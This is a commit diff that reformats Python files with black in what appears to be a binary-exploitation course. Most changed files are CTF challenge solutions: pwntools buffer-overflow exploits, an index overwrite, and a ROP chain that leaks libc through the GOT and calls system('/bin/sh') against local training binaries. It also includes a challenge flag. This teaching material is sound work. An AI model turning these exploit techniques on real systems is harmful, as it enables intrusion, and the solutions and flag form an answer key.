Reformat Python code using black

Use `black` to reformat Python code.

Signed-off-by: Razvan Deaconescu <[email protected]>

chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py

@@ -3,10 +3,10 @@
 f = open("../flag")
 flag = f.readline().strip()
 f.close()
-char = '\n'
+char = "\n"
 
 res = []
 for i in range(0, len(flag)):
     res += [ord(flag[i]) - ord(char)]
 
-print "{" + ", ".join("{}".format(r) for r in res) + "};"
+print("{" + ", ".join("{}".format(r) for r in res) + "};")

chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py

@@ -1,29 +1,30 @@
 from pwn import *
 
 flag = "SSS_CTF{0bad3910f14d10569b8bfe11aa1081e970e72e}\x00"
-flag = ''.join(chr((ord(x) - 13) & 0xff) for x in flag)
+flag = "".join(chr((ord(x) - 13) & 0xFF) for x in flag)
 parts = unpack_many(flag, 32)
 
 for i in range(len(parts)):
-	print('strvec[%d] = 0x%x;' % (i, parts[i]))
+    print("strvec[%d] = 0x%x;" % (i, parts[i]))
 
 
 def encrypt(data):
-	res = map(ord, data)
-	n = len(data)
-	print(hexdump(data))
-	for i in range(n / 2):
-		res[i] = res[i] ^ res[n - i - 1]
-		res[n - i - 1] = (res[n - i - 1] - 1) & 0xff
-	return ''.join(map(chr, res))
+    res = map(ord, data)
+    n = len(data)
+    print(hexdump(data))
+    for i in range(n / 2):
+        res[i] = res[i] ^ res[n - i - 1]
+        res[n - i - 1] = (res[n - i - 1] - 1) & 0xFF
+    return "".join(map(chr, res))
+
 
 binary = ELF("./phone_home")
-context.arch = 'i386'
+context.arch = "i386"
 
 func_ea = binary.symbols["gen_flag"]
 chunk = binary.read(func_ea, 4096)
-func_sz = chunk.find(asm('ret')) + 1
-print('Function size: 0x%x' % func_sz)
+func_sz = chunk.find(asm("ret")) + 1
+print("Function size: 0x%x" % func_sz)
 
 func = encrypt(chunk[:func_sz])
 binary.write(func_ea, func)

chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py

@@ -4,7 +4,7 @@
 PORT = 9999
 MESSAGE = "anaaremere"
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-s.connect(('127.0.0.1', PORT))
+s.connect(("127.0.0.1", PORT))
 
 request = MESSAGE
 print(f"sending '{request}'")

chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py

@@ -4,14 +4,14 @@
 PORT = 9999
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
-s.bind(('', PORT))
+s.bind(("", PORT))
 s.listen(1)
 
 conn, addr = s.accept()
 while True:
     request = conn.recv(1024)
     if not request:
-         break
+        break
 
     reply = request.upper()
     conn.sendall(reply)

chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py

@@ -17,7 +17,7 @@
 offset = 0x40 + 8 - 11
 
 # Address of function `nononono`. Use `nm ./detective` to get it.
-addr = 0x00000000004006d7
+addr = 0x00000000004006D7
 
 payload += offset * b"A" + p64(addr)
 

chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py

@@ -10,6 +10,7 @@
 sha1_key = hashlib.sha1(KEY)
 digest_key = sha1_key.digest()
 
+
 def RC4(data, key):
     x = 0
     box = range(256)
@@ -23,9 +24,10 @@ def RC4(data, key):
         y = (y + box[x]) % 256
         box[x], box[y] = box[y], box[x]
         out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
-    return ''.join(out)
+    return "".join(out)
+
 
-shuffle_key = "".join([ digest_key[7 * i % 20] for i in range(len(digest_key))])
+shuffle_key = "".join([digest_key[7 * i % 20] for i in range(len(digest_key))])
 rc4_msg = RC4(MSG, KEY)
 
 f = open(FILE, "wb")

chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py

@@ -4,13 +4,13 @@
 payload += p32(0x8049378)
 payload += b" HTTP/1.1"
 
-io = remote('127.0.0.1', 4242)
+io = remote("127.0.0.1", 4242)
 
 io.sendline(payload)
 
-sleep(1) # the server is not immediatly created
+sleep(1)  # the server is not immediatly created
 
-io = remote('127.0.0.1', 42042)
+io = remote("127.0.0.1", 42042)
 io.interactive()
 
 

chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py

@@ -2,12 +2,12 @@
 
 payload = "GET /"
 
-io = remote('127.0.0.1', 4242)
+io = remote("127.0.0.1", 4242)
 
-payload = #TODO
+payload = TODO
 io.sendline(payload)
 
-sleep(1) # the server is not immediatly created
+sleep(1)  # the server is not immediatly created
 
-io = remote('127.0.0.1', 42042)
+io = remote("127.0.0.1", 42042)
 io.interactive()

chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py

@@ -1,29 +1,37 @@
 from pwn import *
 
-elf = ELF('buffers')
+elf = ELF("buffers")
 
-bss    = elf.get_section_by_name('.bss')
-data   = elf.get_section_by_name('.data')
-rodata = elf.get_section_by_name('.rodata')
+bss = elf.get_section_by_name(".bss")
+data = elf.get_section_by_name(".data")
+rodata = elf.get_section_by_name(".rodata")
 
-bss_addr    = bss['sh_addr']
-data_addr   = data['sh_addr']
-rodata_addr = rodata['sh_addr']
+bss_addr = bss["sh_addr"]
+data_addr = data["sh_addr"]
+rodata_addr = rodata["sh_addr"]
 
-bss_size = bss['sh_size']
-data_size = data['sh_size']
-rodata_size = rodata['sh_size']
+bss_size = bss["sh_size"]
+data_size = data["sh_size"]
+rodata_size = rodata["sh_size"]
 
 # A (Alloc) = 1 << 1 = 2
 # W (Write) = 1 << 0 = 1
-bss_flags    = bss['sh_flags']
-data_flags   = data['sh_flags']
-rodata_flags = rodata['sh_flags']
+bss_flags = bss["sh_flags"]
+data_flags = data["sh_flags"]
+rodata_flags = rodata["sh_flags"]
 
 print("Section info:")
-print(".bss:    0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr+bss_size, bss_flags))
-print(".data:   0x{:08x}-0x{:08x}, {}".format(data_addr, data_addr+data_size, data_flags))
-print(".rodata: 0x{:08x}-0x{:08x}, {}".format(rodata_addr, rodata_addr+rodata_size, rodata_flags))
+print(".bss:    0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr + bss_size, bss_flags))
+print(
+    ".data:   0x{:08x}-0x{:08x}, {}".format(
+        data_addr, data_addr + data_size, data_flags
+    )
+)
+print(
+    ".rodata: 0x{:08x}-0x{:08x}, {}".format(
+        rodata_addr, rodata_addr + rodata_size, rodata_flags
+    )
+)
 
 print()
 

chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py

@@ -1,12 +1,12 @@
 #!/usr/bin/env python
 from pwn import *
 
-elf = ELF('parrot')
-p = process('parrot')
+elf = ELF("parrot")
+p = process("parrot")
 
-payload = b'A' * (0x20 - 0x4)
+payload = b"A" * (0x20 - 0x4)
 payload += p32(1337)
-payload += b'A' * 8
+payload += b"A" * 8
 payload += p64(elf.symbols.get_shell)
 
 print(payload)

chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py

@@ -1,17 +1,19 @@
 #!/usr/bin/env python
 from pwn import *
 
-elf = ELF('../src/indexing')
-p = process('indexing')
+elf = ELF("../src/indexing")
+p = process("indexing")
+
 
 def scanf_pad(s):
-    return s + b' ' * (4096-len(s))
+    return s + b" " * (4096 - len(s))
+
 
-p.recvuntil(b'Index: ')
-p.send(scanf_pad(b'-3'))
+p.recvuntil(b"Index: ")
+p.send(scanf_pad(b"-3"))
 
 # Give value
-p.recvuntil(b'Value: ')
+p.recvuntil(b"Value: ")
 p.send(scanf_pad(str(elf.symbols.get_shell).encode()))
 
 p.interactive()

chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py

@@ -1,8 +1,8 @@
 from pwn import *
 
-p = process(['../src/level07'])
+p = process(["../src/level07"])
 
-p.sendline(str(-2**31 + (0x30 // 4)))
-p.sendline(p32(0x574f4c46) * (0x30 // 4))
+p.sendline(str(-(2**31) + (0x30 // 4)))
+p.sendline(p32(0x574F4C46) * (0x30 // 4))
 
 p.interactive()

chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py

@@ -4,7 +4,7 @@
 e = ELF("neighbourly")
 p = process("neighbourly")
 
-payload = b'A'*32
+payload = b"A" * 32
 payload += p64(e.symbols.win)
 
 p.sendline(payload)

chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py

@@ -2,32 +2,32 @@
 
 from time import sleep
 
-p = process('input_functions')
+p = process("input_functions")
 
 for i in range(10):
-    p.recvuntil(b'((')
-    n = int(p.recvuntil(b')')[:-1])
+    p.recvuntil(b"((")
+    n = int(p.recvuntil(b")")[:-1])
 
     p.sendline(p64(n))
     print("Done {}".format(i))
 
 print()
 
 for i in range(10):
-    p.recvuntil(b'[[')
-    n = int(p.recvuntil(b']')[:-1])
+    p.recvuntil(b"[[")
+    n = int(p.recvuntil(b"]")[:-1])
 
-    p.send(p64(n) + b'\x00' * 24)
+    p.send(p64(n) + b"\x00" * 24)
     print("Done {}".format(i))
 
 print()
 
-#gdb.attach(p)
+# gdb.attach(p)
 for i in range(10):
-    p.recvuntil(b'{{')
-    n1 = int(p.recvuntil(b'}')[:-1])
-    p.recvuntil(b'{{')
-    n2 = int(p.recvuntil(b'}')[:-1])
+    p.recvuntil(b"{{")
+    n1 = int(p.recvuntil(b"}")[:-1])
+    p.recvuntil(b"{{")
+    n2 = int(p.recvuntil(b"}")[:-1])
 
     p.sendline(str(n1))
     sleep(0.5)

chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py

@@ -1,16 +1,16 @@
 #!/usr/bin/env python
 from pwn import *
 
-p = process('../src/birds')
+p = process("../src/birds")
 # p = remote('127.0.0.1', 31335)
 
-payload = b'A'*(0x30+4)
+payload = b"A" * (0x30 + 4)
 payload += p32(0x539)
-payload += p32(0x1337ca5e)
-payload += p32(0xdeadc0de)
+payload += p32(0x1337CA5E)
+payload += p32(0xDEADC0DE)
 
 p.sendline(payload)
-#p.sendline(p64(0x40119d))
+# p.sendline(p64(0x40119d))
 p.sendline(p64(0x401203))
 
 p.interactive()

chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py

@@ -2,37 +2,55 @@
 
 binary = "rop"
 
-context.log_level = 'error'
+context.log_level = "error"
 context.binary = binary
 p = process(binary)
 elf = ELF(binary)
-libc = ELF("/usr/lib/libc.so.6") # from `ldd rop`
+libc = ELF("/usr/lib/libc.so.6")  # from `ldd rop`
 
 off = 0x38
 
 pop_rdi = 0x0000000000401203
 pop_rsi_r15 = 0x0000000000401201
-pop_rdx = 0x000000000040113a
+pop_rdx = 0x000000000040113A
 
 sh = 0x403004
 
 # write(1, read@got, 8)
-leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write'])
+leak_chain = (
+    p64(pop_rdi)
+    + p64(1)
+    + p64(pop_rsi_r15)
+    + p64(elf.got["read"])
+    + p64(0)
+    + p64(pop_rdx)
+    + p64(8)
+    + p64(elf.plt["write"])
+)
 # read(0, read@got, 8)
-ow_got_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['read'])
+ow_got_chain = (
+    p64(pop_rdi)
+    + p64(0)
+    + p64(pop_rsi_r15)
+    + p64(elf.got["read"])
+    + p64(0)
+    + p64(pop_rdx)
+    + p64(8)
+    + p64(elf.plt["read"])
+)
 # read(buf) -> system("/bin/sh")
-call_system_chain = p64(pop_rdi) + p64(sh) + p64(elf.plt['read'])
+call_system_chain = p64(pop_rdi) + p64(sh) + p64(elf.plt["read"])
 
 chain = b"A" * off + leak_chain + ow_got_chain + call_system_chain
 
 p.send(chain + b" " * (0x200 - len(chain)))
 read_addr = u64(p.recv(8))
-libc.address = read_addr - libc.symbols['read']
+libc.address = read_addr - libc.symbols["read"]
 
 print("read_addr = {}".format(hex(read_addr)))
-print("system_addr = {}".format(hex(libc.symbols['system'])))
+print("system_addr = {}".format(hex(libc.symbols["system"])))
 
 # gdb.attach(p)
-p.send(p64(libc.symbols['system']))
+p.send(p64(libc.symbols["system"]))
 
 p.interactive()